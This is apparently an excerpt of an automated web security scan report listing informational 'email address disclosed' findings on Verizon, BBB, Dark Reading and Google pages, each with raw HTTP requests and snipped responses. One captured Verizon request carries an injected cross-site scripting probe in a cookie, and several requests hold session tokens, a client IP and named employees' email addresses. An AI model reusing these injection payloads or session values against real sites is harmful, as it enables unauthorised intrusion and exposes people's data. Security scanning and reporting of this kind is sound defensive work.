HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251


<html>

<head>
   <title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...
<br />
Your e-mail address is either your Verizon Online User Name OR your Alias followed by the appropriate domain (for example, username@verizon.net, username@mycompany.com, myalias@gte.net, or myalias@bellatlantic.net)<br />
...[SNIP]...

19.12. https://www.bbb.org/online/consumer/cks.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:36:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...
<a href="mailto:infringement@council.bbb.org?subject= Misuse of BBBOnLine Seals">
infringement@council.bbb.org</a>
...[SNIP]...

19.13. http://www.darkreading.com/security/attacks/showArticle.jhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /security/attacks/showArticle.jhtml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:36:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 22:38:09 GMT; path=/
Location: https://login.techweb.com/cas/login?service=http://www.darkreading.com/security/attacks/showArticle.jhtml&gateway=true
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
<a href="mailto:feedback@techweb.com" target="_blank">
...[SNIP]...
<a href="mailto:editors@darkreading.com">
...[SNIP]...

19.14. https://www.google.com/accounts/ServiceLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:nej40pZ-DDJ9AuDvMixEXuI_isIpQw:dizilfo2QNAghruN;Path=/accounts;Expires=Wed, 04-Sep-2013 22:36:17 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 05 Sep 2011 22:36:17 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11099
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

19.15. http://www.verizonbusiness.com/Medium/sign-in/vec/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.5.9.1315279031192; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5253d46cfeae5ec60b43ca341768ecf3"
Last-Modified: Mon, 05 Sep 2011 22:17:44 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 20846
Date: Mon, 05 Sep 2011 22:17:45 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262264|VP%3d5|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:21:28 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:17:44 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a target="_blank" class="box" href="mailto:vec-support@verizonbusiness.com">
...[SNIP]...

19.16. http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/basic.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/basic.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.3.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "efabc9eb5d40da22e2cb4cf79593e04e"
Last-Modified: Mon, 05 Sep 2011 22:22:29 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 23484
Date: Mon, 05 Sep 2011 22:22:29 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:29 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.17. http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/essentials.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/essentials.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:14 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "9fc0b24323db5f76be4b1cfc3dd676c8"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 26281
Date: Mon, 05 Sep 2011 22:22:14 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:14 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.18. http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/igus.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/igus.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.6.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "10b85a197b72ecf9f7e34e76c23b568f"
Last-Modified: Mon, 05 Sep 2011 22:23:12 GMT
Vary: *
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 22693
Date: Mon, 05 Sep 2011 22:23:12 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:23:12 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a class="box" target="_blank" href="mailto:vec-support@verizonbusiness.com">
...[SNIP]...

19.19. http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/looking.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/looking.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.10.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "fc491c0b43858ff0d9914c34c0d12332"
Last-Modified: Mon, 05 Sep 2011 22:25:31 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 21785
Date: Mon, 05 Sep 2011 22:25:31 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:25:31 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a class="box" target="_blank" href="mailto:vec-support@verizonbusiness.com">
...[SNIP]...

19.20. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/network.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/network.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.2.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:18 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "6b7625234ff33f97a48e6869288d96f4"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23376
Date: Mon, 05 Sep 2011 22:22:18 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:18 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.21. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/voip.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/voip.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:42 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "343cd25e06471fded4613ae60450d2ab"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 24141
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.22. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/wan.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /Medium/sign-in/vec/wan.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:52 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "1ae63ef34043aa573ff4ad6621f7d0f9"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23155
Date: Mon, 05 Sep 2011 22:22:53 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:52 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.23. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.7.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5eff3d3484488f3a491f0ebee89e9e2b"
Last-Modified: Mon, 05 Sep 2011 22:18:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 33927
Date: Mon, 05 Sep 2011 22:18:11 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<a href="mailto:janet.brumfield@verizon.com">janet.brumfield@verizon.com</a>
...[SNIP]...
<a href="mailto:knechtj@us.ibm.com">knechtj@us.ibm.com</a>
...[SNIP]...
<a href="mailto:junaidah.dahlan@sg.verizonbusiness.com">junaidah.dahlan@sg.verizonbusiness.com</a>
...[SNIP]...
<a href="mailto:clare.ward@verizonbusiness.com">clare.ward@verizonbusiness.com</a>
...[SNIP]...

19.24. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; 
NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Content-Type: application/x-javascript
Content-Location: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js
Last-Modified: Fri, 29 Jul 2011 09:51:56 GMT
Accept-Ranges: bytes
ETag: "06ba26d54dcc1:b178"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:41:49 GMT
Content-Length: 94215
Connection: close

///VZ 2.0 Customize Function
var IsNETProfile = "F";
function changeSDetails(activeTab) {

if (activeTab == 1) {

if (document.getElementById('WIcon').className == 'SerPlus') {

...[SNIP]...
}
}
}
